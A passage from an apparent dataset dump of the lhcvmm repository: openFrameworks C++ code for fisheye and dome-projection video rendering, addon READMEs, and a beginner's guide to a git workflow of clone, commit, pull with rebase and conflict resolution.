|\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_PILEUP | float | scalefactor for pileup reweighting |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_TRIGGER | float | scalefactor for trigger |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_ZVERTEX | float | scalefactor for z-vertex reweighting |\n+==========================+===============+====================================================================================+\n\n\n'''\n" }, { "alpha_fraction": 0.6056910753250122, "alphanum_fraction": 0.619918704032898, "avg_line_length": 20.39130401611328, "blob_id": "e747c0c6859674652effe2efbcb28382678afe7b", "content_id": "3315f2368fc1b2ca8f8fc5174190b8577c3af024", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 492, "license_type": "no_license", "max_line_length": 74, "num_lines": 23, "path": "/Graphics/examples/ofxFisheyeExample/src/main.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofMain.h\"\n#include \"ofApp.h\"\n\n//========================================================================\nint main( ){\n\n\tofSetLogLevel(OF_LOG_VERBOSE);\n\tint windowWidth = 768;\n\tint windowHeight = 768;\n \n\t#ifdef TARGET_OPENGLES\n ofGLESWindowSettings settings;\n\tsettings.width = windowWidth;\n\tsettings.height = windowHeight;\n\tsettings.setGLESVersion(3);\n\tofCreateWindow(settings);\n\t#else\n\tofSetupOpenGL(windowWidth, windowHeight, OF_WINDOW);\n\t#endif\n\n\tofRunApp( new ofApp());\n\n}\n" }, { "alpha_fraction": 0.8005502223968506, "alphanum_fraction": 0.8046767711639404, "avg_line_length": 47.46666717529297, "blob_id": "045a9069d208fc484286866f4d22e0fe40ba253d", "content_id": "0d9305d716f6ac140c1e9ef02e277ca503bfc82a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 727, "license_type": "no_license", "max_line_length": 229, "num_lines": 15, "path": "/Graphics/examples/ofxDomemasterExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# ofxDomemasterExample\n\n### Description\nExample app of the ofxDomemaster addon.\nThis addon uses a multi-camera technique to generate a 5-sided cube map and renders each view to pregenerated meshes for spherical distortion.\nA circular image mask overlays the fisheye render to create a circular composition.\n\nUse of this addon requires that you copy the domemaster folder located within the example project's bin folder to your project.\n\n\n### Dependencies\n* addons: ofxDomemaster.\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). 
To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.8002915382385254, "alphanum_fraction": 0.8032069802284241, "avg_line_length": 61.3636360168457, "blob_id": "ac362c31254499b2f0c0e9f249794077123f7d7e", "content_id": "e58523b77a43d66f1c132694a6e29754ce7cbf55", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 686, "license_type": "permissive", "max_line_length": 226, "num_lines": 11, "path": "/Graphics/addons/ofxDomemaster/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "ofxDomemaster\n=============\n\nAn openFrameworks addon for creating domemasters. A domemaster is the standard format for projection within digital dome theatres. Simply put it is a square composition with a circular mask and fisheye distortion.\n\nThis addon uses a multi-camera technique to generate a 5-sided cube map and renders each view to pregenerated meshes for spherical distortion. A circular image mask overlays the fisheye render to create a circular composition.\n\nUse of this addon requires that you copy the domemaster folder located within the example project's bin folder to your project. \n\nMesh and mask assets generated by Paul Bourke: \nhttp://paulbourke.net/dome/unity3d/\n" }, { "alpha_fraction": 0.5492937564849854, "alphanum_fraction": 0.5651130080223083, "avg_line_length": 35.49226760864258, "blob_id": "d707a9e72db24d0323ba0a653358e4f88a46159d", "content_id": "9ad831f6932bf959fe7b87eeb13c09bebbc25571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14160, "license_type": "no_license", "max_line_length": 140, "num_lines": 388, "path": "/Graphics/apps/videoTest_2/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetLogLevel(OF_LOG_VERBOSE);\n \n //openGl and GLSL info------\n ofLogVerbose()<<\"GLVersionMajor: \"<< ofGetGLRenderer()->getGLVersionMajor();\n ofLogVerbose()<<\"GLVersionMinor: \"<< ofGetGLRenderer()->getGLVersionMinor();\n ofLogVerbose()<<\"GLSL Version: \"<< ofGLSLVersionFromGL(ofGetGLRenderer()->getGLVersionMajor(), ofGetGLRenderer()->getGLVersionMinor());\n \n //renderer setup-------------------\n ofSetFrameRate(FRAME_RATE);\n frameDuration = 1.0 / FRAME_RATE;\n framesMaxNumber = DURATION * FRAME_RATE;\n frameCounter = 0;\n isAnimating = false;\n ofLogVerbose()<<\"ANIMATION INFO ---- \";\n ofLogVerbose()<<\"Frame Rate: \"<< FRAME_RATE;\n ofLogVerbose()<<\"Frame Duration: \"<< frameDuration;\n ofLogVerbose()<<\"Frames Max Number: \"<< framesMaxNumber <<\"\\n---------\";\n \n \n fisheye.setup(tVariableFisheye);\n fisheyeAmount = 0.0;\n \n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n \n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n \n \n //shaders---------------------\n#ifdef TARGET_OPENGLES\n\tshader.load(\"shadersES2/shader\");\n#else\n\tif(ofIsGLProgrammableRenderer()){\n ofLogVerbose()<<\"Using ProgrammableRenderer\";\n\t}else{\n ofLogVerbose()<<\"NOT Using ProgrammableRenderer\";\n\t}\n#endif\n \n //gui-------------\n gm.setup();\n\n ofSetBackgroundColor(80);\n \n cam.lookAt(ofVec3f( ofGetWidth()*.5, ofGetHeight()*.5, 0.0));\n light.setPosition(ofGetWidth()*.5, ofGetHeight()*.5, 
150.0);\n    light.setPointLight();\n    \n    instanced.setup();\n    instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n    instanced.setOrientation(ofVec3f(1,1,1));\n    instanced.setColor(ofColor::white);\n    \n    currentValuesMode = TIMELINE;\n    bShowGui = false;\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n    //display frame rate as window title\n    ofSetWindowTitle(ofToString(ofGetFrameRate()));\n\n    //update instancedManager values\n    updateInstancedValues();\n    \n    //animation data update\n    if(isAnimating){\n        frameCounter++;\n        timelineApp->timeline.setCurrentFrame(frameCounter);\n        animationTime = frameCounter * frameDuration;\n        animValue = animationTime/DURATION;\n        \n        //end recording and animation at 15\"\n        if (frameCounter>=framesMaxNumber){\n            stopAnimation();\n            renderer.stopRecording();\n        }\n    }\n    //-----------------------------------\n    \n    int rw = renderer.getFboWidth();\n    int rh = renderer.getFboHeight();\n    \n    //draw openGL scene in drawFbo\n    drawFbo.begin();\n    ofClear(0);\n    drawScene(rw, rh);\n    drawFbo.end();\n    \n    //fisheye with timeline\n    fisheyeAmount = timelineApp->timeline.getValue(\"fisheye\");\n    \n    renderer.getFbo()->begin();\n    ofClear(0);\n    fisheye.begin(drawFbo.getTexture(), rw, rh, fisheyeAmount);\n    glBegin(GL_QUADS);\n    glTexCoord2f(0, 0); glVertex3f(0, 0, 0);\n    glTexCoord2f(rw, 0); glVertex3f(rw, 0, 0);\n    glTexCoord2f(rw, rh); glVertex3f(rw, rh, 0);\n    glTexCoord2f(0,rh); glVertex3f(0, rh, 0);\n    glEnd();\n    fisheye.end();\n    renderer.getFbo()->end();\n    \n    //Record Renderer's FBO into a .mov file or png sequence\n    renderer.update();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n    \n    //drawScene(ofGetHeight(), ofGetWidth());\n    if (bShowGui) gm.gui.draw();\n    \n    //Scaled Renderer's FBO preview----------\n    renderer.draw(250, 0, 512, 512);\n    \n    //Recording indicator-------------------\n    if(renderer.getIsRecording()){\n        ofPushStyle();\n        ofPushMatrix();\n        ofTranslate(ofGetWidth() - 60, 60);\n        ofSetColor(255, 0, 0);\n        ofDrawCircle(0,0, 40);\n        ofSetColor(ofColor::white);\n        ofDrawBitmapString(\"REC\", -10, 0);\n        ofPopMatrix();\n        ofPopStyle();\n    }\n    \n    //Display Key commands-----------------\n    ofPushStyle();\n    string keys = \"KEY COMMANDS:\";\n    keys += \"\\nSpacebar: START/STOP Animation\"\n    \"\\nr: START/STOP Recording & Animation\"\n    \"\\np: Png sequence\"\n    \"\\nm: MOV-H264 file\"\n    \"\\n1: 256x256\"\n    \"\\n2: 512x512\"\n    \"\\n3: 1024x1024\"\n    \"\\n4: 2048x2048\"\n    \"\\n5: 4096x4096\";\n    ofSetColor(ofColor::white);\n    ofDrawBitmapString(keys, 10, 20);\n    ofPopStyle();\n    \n    //Display Info-----------------\n    ofPushStyle();\n    string info = \"INFO: \";\n    info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n    + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n    + \"\\nREC mode: \" + renderer.getRecordingModeAsString();\n    if(renderer.getIsRecording()){\n        info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n    }\n    ofSetColor(ofColor::yellow);\n    ofDrawBitmapString(info, 10, ofGetHeight()-100);\n    ofPopStyle();\n\n}\n//--------------------------------------------------------------\nvoid ofApp::exit(){\n    renderer.exit();\n}\n//--------------------------------------------------------------\nvoid ofApp::drawScene(int w, int h){\n    \n    
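//scene pass: optional point light and easyCam wrap the instanced cubes; the HUD text is drawn on top at the end\n    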
if(gm.gUseLight){\n light.disable();\n ofDisableLighting();\n }\n \n //INFO DISPLAY--------------------------------\n ofPushStyle();\n ofSetColor(ofColor::white);\n string sceneInfo = \"Time: \" + ofToString(animationTime, 2)\n + \"\\nFisheye: \" + ofToString(fisheyeAmount, 2);\n verdana.drawString(sceneInfo, w*.35, h-h*.15);\n ofPopStyle();\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::updateInstancedValues(){\n \n float w = renderer.getFboWidth();\n \n if(currentValuesMode==GUI){\n \n if(!gm.gMode)instanced.setMode(LINEAL);\n else if(gm.gMode && !gm.gRadMode) instanced.setMode(RAD_CONCENTRIC);\n else if(gm.gMode && gm.gRadMode){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(gm.gRadDeform);\n }\n \n instanced.setWidth(gm.gWidth);\n instanced.setHeight(gm.gHeight);\n instanced.setCubeSize(gm.gCubesizeUnified * MAX_CUBESIZE*w);\n // instanced.setCubeSize(ofVec3f(gCubesize->x * MAX_CUBESIZE,\n // gCubesize->y * MAX_CUBESIZE,\n // gCubesize->z * MAX_CUBESIZE));\n instanced.setMaskRadius(gm.gMaskRadius);\n instanced.setHres(gm.gHres * MAX_H_RES);\n instanced.setVres(gm.gVres * MAX_V_RES);\n instanced.setVelocity(gm.gVelocity * MAX_VELOCITY);\n instanced.setXpos(gm.gXpos);\n instanced.setYpos(gm.gYpos);\n //nz\n instanced.setNzTime(gm.gNzTime * MAX_NZ_TIME);\n \n instanced.setXnzAmp(gm.gNzXAmp * MAX_NZ_AMP*w);\n instanced.setXnzFreq(gm.gNzXFreq * MAX_NZ_FREQ);\n instanced.setXnzRug(gm.gNzXRug * MAX_NZ_RUG*w);\n \n instanced.setYnzAmp(gm.gNzYAmp * MAX_NZ_AMP*w);\n instanced.setYnzFreq(gm.gNzYFreq * MAX_NZ_FREQ);\n instanced.setYnzRug(gm.gNzYRug * MAX_NZ_RUG*w);\n \n instanced.setZnzAmp(gm.gNzZAmp * MAX_NZ_AMP*w);\n instanced.setZnzFreq(gm.gNzZFreq * MAX_NZ_FREQ);\n instanced.setZnzRug(gm.gNzZRug * MAX_NZ_RUG*w);\n \n //light pos\n \n light.setPosition(gm.gLightPos->x * MAX_LIGHT_X,\n gm.gLightPos->y * MAX_LIGHT_Y,\n gm.gLightPos->z * MAX_LIGHT_Z );\n }\n else if (currentValuesMode==TIMELINE){\n \n if(!timelineApp->timeline.isSwitchOn(\"mode\"))instanced.setMode(LINEAL);\n else if(timelineApp->timeline.isSwitchOn(\"mode\") && !timelineApp->timeline.isSwitchOn(\"radMode\")) instanced.setMode(RAD_CONCENTRIC);\n else if(timelineApp->timeline.isSwitchOn(\"mode\") && timelineApp->timeline.isSwitchOn(\"radMode\")){\n instanced.setMode(RAD_CENTRIFUGE);\n instanced.setRadDeform(timelineApp->timeline.getValue(\"radDeform\"));\n }\n \n instanced.setWidth(timelineApp->timeline.getValue(\"width\"));\n instanced.setHeight(timelineApp->timeline.getValue(\"height\"));\n instanced.setCubeSize(timelineApp->timeline.getValue(\"cubesize\") * MAX_CUBESIZE *w);\n instanced.setMaskRadius(timelineApp->timeline.getValue(\"maskRadius\"));\n instanced.setHres(timelineApp->timeline.getValue(\"Hres\") * MAX_H_RES);\n instanced.setVres(timelineApp->timeline.getValue(\"Vres\") * MAX_V_RES);\n instanced.setXpos(timelineApp->timeline.getValue(\"Xpos\"));\n instanced.setYpos(timelineApp->timeline.getValue(\"Ypos\"));\n instanced.setVelocity(timelineApp->timeline.getValue(\"velocity\") * MAX_VELOCITY);\n //nz\n instanced.setNzTime(timelineApp->timeline.getValue(\"nzTime\") * MAX_NZ_TIME);\n \n instanced.setXnzAmp(timelineApp->timeline.getValue(\"nzXAmp\") * MAX_NZ_AMP *w);\n instanced.setXnzFreq(timelineApp->timeline.getValue(\"nzXFreq\") * MAX_NZ_FREQ);\n instanced.setXnzRug(timelineApp->timeline.getValue(\"nzXRug\") * MAX_NZ_RUG *w);\n \n instanced.setYnzAmp(timelineApp->timeline.getValue(\"nzYAmp\") * MAX_NZ_AMP *w);\n 
instanced.setYnzFreq(timelineApp->timeline.getValue(\"nzYFreq\") * MAX_NZ_FREQ);\n instanced.setYnzRug(timelineApp->timeline.getValue(\"nzYRug\") * MAX_NZ_RUG *w);\n \n instanced.setZnzAmp(timelineApp->timeline.getValue(\"nzZAmp\") * MAX_NZ_AMP*w);\n instanced.setZnzFreq(timelineApp->timeline.getValue(\"nzZFreq\") * MAX_NZ_FREQ);\n instanced.setZnzRug(timelineApp->timeline.getValue(\"nzZRug\") * MAX_NZ_RUG *w);\n \n //light pos\n \n light.setPosition(gm.gLightPos->x * MAX_LIGHT_X,\n gm.gLightPos->y * MAX_LIGHT_Y,\n gm.gLightPos->z * MAX_LIGHT_Z );\n \n \n }\n\n}\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key){\n //start-stop Animation--------------------\n case ' ':\n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //start-stop Animation & Recording---------------\n case 'r':\n if(!renderer.getIsRecording())renderer.startRecording();\n else renderer.stopRecording();\n \n if(!isAnimating)startAnimation();\n else stopAnimation();\n break;\n //change resolution-----------------------------\n case '1':\n if(renderer.getOutputResolution()!= r256){\n renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.04, true, true);\n drawFbo.clear();\n drawFbo.allocate(renderer.getFboWidth(), renderer.getFboHeight());\n instanced.setLimits(ofVec3f(renderer.getFboWidth(), renderer.getFboHeight(), 100));\n }\n break;\n \n //change recording mode---------------\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n\n case 'g':\n bShowGui = !bShowGui;//show-hide gui\n break;\n case 't':\n if(currentValuesMode==GUI)currentValuesMode=TIMELINE;\n else if(currentValuesMode==TIMELINE)currentValuesMode=GUI;\n break;\n default:\n break;\n }\n \n}\n//--------------------------------------------------------------\nvoid ofApp::startAnimation(){\n isAnimating=true;\n ofLogNotice(\"Animation 
STARTED\");\n}\n//--------------------------------------------------------------\nvoid ofApp::stopAnimation(){\n frameCounter = 0;\n isAnimating = false;\n ofLogNotice(\"Animation STOPED\");\n}\n\n" }, { "alpha_fraction": 0.583791196346283, "alphanum_fraction": 0.5892857313156128, "avg_line_length": 14.82608699798584, "blob_id": "a42a7e18faeb596c6f3c7b625473ff6ef5e56531", "content_id": "4d1c0e40f3ca725c08f5b27a72fd8f6c0fe44e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 728, "license_type": "no_license", "max_line_length": 52, "num_lines": 46, "path": "/Graphics/apps/videoTest_3/src/particleSystem/ParticleGroupSystem.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n\n#include \"ParticleGroup.h\"\n\n\nclass ParticleGroupSystem{\n\n public:\n \n void setup(int x, int y, int w, int h, int dir);\n void update(std::map<string, float>& data);\n void drawParticles();\n void exit(){};\n \n void addParticlesGroup(int groupPartsNum);\n \n void addGpuParticles(ofVec3f pos);\n \n void setDoAddRandom(bool b){bDoAddRandom = b;}\n \n bool getDoAddRandom(){return bDoAddRandom;}\n \n int _w, _h;\n int _x, _y;\n \n int _dir;//-1, 1\n \n ofVec2f bounds_h;\n \n vector<ParticleGroup*> partGroups;\n \n float _minRadius, _maxRadius;\n \n float radiusInit;\n float angleInit;\n \n bool bDoAddRandom;\n \n \n \n \n\n\n};\n" }, { "alpha_fraction": 0.6464690566062927, "alphanum_fraction": 0.666085422039032, "avg_line_length": 30.397260665893555, "blob_id": "7319d26dc6f036fd82ef814723cd3cad513b124e", "content_id": "1efab7ad6c7d5563b1518e248d5ddad279febd23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2294, "license_type": "no_license", "max_line_length": 82, "num_lines": 73, "path": "/Graphics/apps/videoTest_2/src/TimelineApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"TimelineApp.h\"\n\nvoid TimelineApp::setup(){\n\n ofBackground(40);\n\tofSetVerticalSync(false);\n \n ofSetLogLevel(OF_LOG_VERBOSE);\n \n timeline.setWorkingFolder(\"timeline\");\n \n ofxTimeline::removeCocoaMenusFromGlut(\"AllTracksExample\");\n timeline.setup();\n timeline.setFrameRate(FRAME_RATE);\n timeline.setDurationInSeconds(DURATION);\n timeline.setFrameBased(TRUE);\n \n \n#ifdef TIMELINE_VIDEO_INCLUDED\n timeline.addVideoTrack(\"fingers\", \"fingers.mov\");\n#endif\n#ifdef TIMELINE_AUDIO_INCLUDED\n timeline.addAudioTrack(\"audio\", \"4chan.wav\");\n timeline.setDurationInSeconds(timeline.getAudioTrack(\"audio\")->getDuration());\n#endif\n \n timeline.addSwitches(\"mode\");\n timeline.addSwitches(\"radMode\");\n timeline.addCurves(\"width\", ofRange(0, 1));\n timeline.addCurves(\"height\", ofRange(0, 1));\n timeline.addCurves(\"Xpos\", ofRange(0, 1));\n timeline.addCurves(\"Ypos\", ofRange(0, 1));\n timeline.addCurves(\"Hres\", ofRange(0, 1));\n timeline.addCurves(\"Vres\", ofRange(0, 1));\n \n timeline.setPageName(\"General\");\n \n //timeline.addSwitches(\"switches\");\n \n timeline.addPage(\"Parameters\");\n timeline.setCurrentPage(\"Parameters\");\n timeline.addCurves(\"velocity\", ofRange(0, 1));\n timeline.addCurves(\"maskRadius\", ofRange(0, 1));\n timeline.addCurves(\"radDeform\", ofRange(0, 1));\n timeline.addCurves(\"cubesize\", ofRange(0, 1));\n timeline.addCurves(\"fisheye\", ofRange(0, 1));\n \n timeline.addPage(\"Noise\");\n timeline.setCurrentPage(\"Noise\");\n timeline.addCurves(\"nzTime\", ofRange(0, 1));\n 
timeline.addCurves(\"nzXAmp\", ofRange(0, 1));\n timeline.addCurves(\"nzXFreq\", ofRange(0, 1));\n timeline.addCurves(\"nzXRug\", ofRange(0, 1));\n timeline.addCurves(\"nzYAmp\", ofRange(0, 1));\n timeline.addCurves(\"nzYFreq\", ofRange(0, 1));\n timeline.addCurves(\"nzYRug\", ofRange(0, 1));\n timeline.addCurves(\"nzZAmp\", ofRange(0, 1));\n timeline.addCurves(\"nzZFreq\", ofRange(0, 1));\n timeline.addCurves(\"nzZRug\", ofRange(0, 1));\n \n timeline.setCurrentPage(\"General\");\n\n timeline.enableSnapToOtherKeyframes(false);\n //timeline.setLoopType(OF_LOOP_NORMAL);\n timeline.setLoopType(OF_LOOP_NONE);\n \n \n}\n//---------------------\n\nvoid TimelineApp::draw(){\n timeline.draw();\n}\n" }, { "alpha_fraction": 0.5846354365348816, "alphanum_fraction": 0.5924479365348816, "avg_line_length": 16.837209701538086, "blob_id": "6ab9c1602fca5335d33f8536e1d44b43d1c6d0f7", "content_id": "596694dc0b5caed0b4f326a9c38ab1651567d7c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 768, "license_type": "no_license", "max_line_length": 96, "num_lines": 43, "path": "/Graphics/apps/final/src/particleSystem/ParticleGroup.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#pragma once\n\n#include \"ofMain.h\"\n#include \"BosqueConstants.h\"\n\n\n\nclass ParticleGroup{\n\n public:\n \n ParticleGroup(int partsNum, int x, int y, int w, int d, float radiusInit, float angleInit);\n ~ParticleGroup();\n \n void update(std::map<string, float>& data);\n void draw();\n \n int getPartsNum(){return _partsNum;}\n bool isOutOfBounds(int x_min, int x_max);\n ofVec3f getAnchorPos(){return _anchor;}\n \n //Vars---\n vector<ofVec3f> positions;\n \n \n \n private:\n //int _Xpos;\n int _x, _y, _z;\n int _w;\n int _dir;//-1 o 1\n int _partsNum;\n int _size;\n float _angle;\n \n float _rotAngleInit;\n float _rotRadiusInit;\n \n ofVec3f _anchor;\n vector<ofVec3f> velocities;\n \n int frameCounter;\n};\n" }, { "alpha_fraction": 0.744926393032074, "alphanum_fraction": 0.7495025992393494, "avg_line_length": 29.64634132385254, "blob_id": "fa4303be69305e215724cd71ca35acdb2bd50872", "content_id": "f75ad9f3ab8a05c290cb6474eebe3171fc7b78d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5026, "license_type": "no_license", "max_line_length": 432, "num_lines": 164, "path": "/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# lhcvmm\nLarge Hadron Collider Visual Music Machine\n\n[![Join the chat at https://gitter.im/Opensemble](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/Opensemble)\n\n# What lives here\n\n* rendererExample: this is the very first inner-project of LHCVMM. Is a video renderer engine built on Open Frameworks needed to test drive the Full-Dome hardware where the final project will be presented.\n\n\n# Collaborating\n\nWe are using, for the time being, a centralized git workflow and a single branch `master`. Hopefully we'll grow enough to embrace a more complex git workflow.\n\n### starting\n\nFirst of all, you'll need to clone this repo. 
We'll do it on the command line as it is the easiest way to *understand* Git.\n\n```bash\n\ngit clone [email protected]:Opensemble/lhcvmm.git\n\n```\n\nYou'll now have a directory named lhcvmm with the source code inside.\n\n\n### Adding and publishing changes\n\nOnce cloned, you can start working on your working copy, adding new files or changes.\nIn order to share them with the community you'll need to upload them to Github again.\nThis is done in 3 steps:\n\n1. Add your changes\n2. Get other people's changes\n3. Upload to Github\n\n#### 1. Add your changes\nAfter modifying the files you need to add the changes to version control:\n\n```bash\n\ngit add <filename>\n\n```\n\nwhere `<filename>` can be a single file, a list of files separated by spaces, or a directory (this will add every file changed under that directory and its children).\n\n\nThen you need to bundle those changes in a commit:\n\n```bash\n\ngit commit\n\n```\n\nThis will open a text editor so you can leave a message, so that other developers in the same project can know what changes you made, why you made them, and any other information you think will be useful or necessary for other people. Think of this message as a mail that you would send to another developer/artist regarding what you've worked on. (See the section `commit messages format` for a detailed explanation of how to write these.)\nThis may look like a boring or bureaucratic step, but in open source projects good communication is a key piece of a successful project, and having a readable commit history is part of that.\n\n\n#### 2. Get other people's changes\n\nIf other people pushed their commits to Github while you were working, then Git will ask you to update your working copy, as there are changes already published that you don't have.\nAnd to avoid problems, you always have to be up to date before publishing your changes. 
For this you do:\n\n```bash\n\ngit pull --rebase\n\n```\n\nThis command will connect to Github, fetch the latest changes, and add all of those before the changes you committed in the previous step.\n(pull will fetch the changes, and the --rebase option will place them before your work).\n\nIf the changes you brought from Github are on different files and/or different lines, then your local repository is now updated.\nBut what happens if, in the changes you pulled from Github, another developer changed exactly the same lines you also changed?\nHow does Git know which of the two versions is the correct one?\n\n*It does not!*\n\nThat's called a *conflict*, and Git will let you know that it encountered one while merging your changes with the other people's changes.\nAnd you have to resolve it by hand (this is one of the things the commit messages are useful for :) )\nYou'll see something like:\n\n```Git\n\nOn branch branch-b\n # You have unmerged paths.\n # (fix conflicts and run \"git commit\")\n #\n # Unmerged paths:\n # (use \"git add ...\" to mark resolution)\n #\n # both modified: planets.md\n #\n no changes added to commit (use \"git add\" and/or \"git commit -a\")\n\n```\n\nTo resolve a conflict you'll need to edit the file with conflicts (_planets.md_ in this example) and search for the lines between:\n\n```diff\n\n<<<<<<< HEAD (your current version)\nnine\n=======\neight\n>>>>>>> another-commit-hash (the version published by the other dev)\n\n```\n\nSo you need to decide which of the two sets of lines is the correct one, the one before the `=======` or the one after it.\nOnce decided, you erase the other one, along with all the marker characters added by Git.\nNext you need to tell Git that you resolved the conflict:\n\n```bash\n\ngit add <the-file-or-files-with-resolved-conflicts>\n\n```\n\nAnd to continue with the update process you run:\n\n```bash\n\ngit rebase --continue\n\n```\n\nThis command will stop again if it finds another conflict. You'll need to repeat the process.\n\nIf it doesn't find more conflicts, then you are ready to upload your changes to Github.\n\n\n#### 3. 
Upload to Github\n\nTo send your changes to Github you run:\n\n```bash\n\ngit push\n\n```\n\n\n\n\n### Appendix 1: Commit Message Format\n\nHere are some pretty good guidelines and arguments about good commit messages:\n\nhttps://robots.thoughtbot.com/5-useful-tips-for-a-better-commit-message\n\nAnd here's how they should be formatted:\n\nhttp://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html\n\n\n### Appendix 2: The ultimate Git documentation\n\nhttps://git-scm.com/book/en/v2\n\nChapters 2 and 3 should be more than enough to begin understanding Git :)\n" }, { "alpha_fraction": 0.631393313407898, "alphanum_fraction": 0.6340388059616089, "avg_line_length": 18.237287521362305, "blob_id": "2d6d7731c3ea572f95303af90aa6c7ccce1b06d6", "content_id": "3df0e1de1ad128b2ff6f386bcfb840a98d307272", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1134, "license_type": "no_license", "max_line_length": 46, "num_lines": 59, "path": "/Graphics/apps/videoTest_3/src/SphereManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n\n#include \"ofxGui.h\"\n#include \"DisplacementSphereMesh.h\"\n\nclass SphereManager{\n\npublic:\n    \n    void setup();\n    void update();\n    void drawScene();\n    void exit(){};\n    \n    void setupGui();\n    void drawGui();\n    \n    void setPosition(ofVec3f pos){_pos = pos;}\n    ofVec3f getPosition(){return _pos;}\n    \n    void setColor(ofColor col);\n    \n    \n\n    \n    ofColor _mainColor;\n    \n    ofMaterial material;\n    ofVec3f _pos;\n    \n    //Cubes-sphere----------------\n    ofSpherePrimitive sphereCubes;\n    ofMesh cubeMesh;\n    \n    //Displacement-sphere-------\n    DisplacementSphereMesh displacement;\n    int dispResolution;\n    vector<ofMeshFace> triangles;\n    ofSpherePrimitive sphereDistor;\n    float dispNzAmnt;\n    bool bDoFaceSh, bDoFaces;\n    ofShader faceShader;\n    ofShader phongShader;\n    \n    //gui------------------\n    ofxPanel gui;\n    ofxFloatSlider velGui;\n    ofxFloatSlider volumeGui;\n    ofxFloatSlider xGui, yGui;\n    ofxFloatSlider radiusGui;\n    ofxIntSlider resolGui;\n    ofxFloatSlider faceNoiseGui;\n    ofxFloatSlider strengthGui;\n    ofxFloatSlider zPos;\n\n    \n};" }, { "alpha_fraction": 0.7744107842445374, "alphanum_fraction": 0.7786589860916138, "avg_line_length": 49.53571319580078, "blob_id": "d034ce61336fb1242566b6d8f590af7fa8d6be2c", "content_id": "984ba46e8fc8de35b25cb48b3f34e04084e7cc88", "detected_licenses": [], 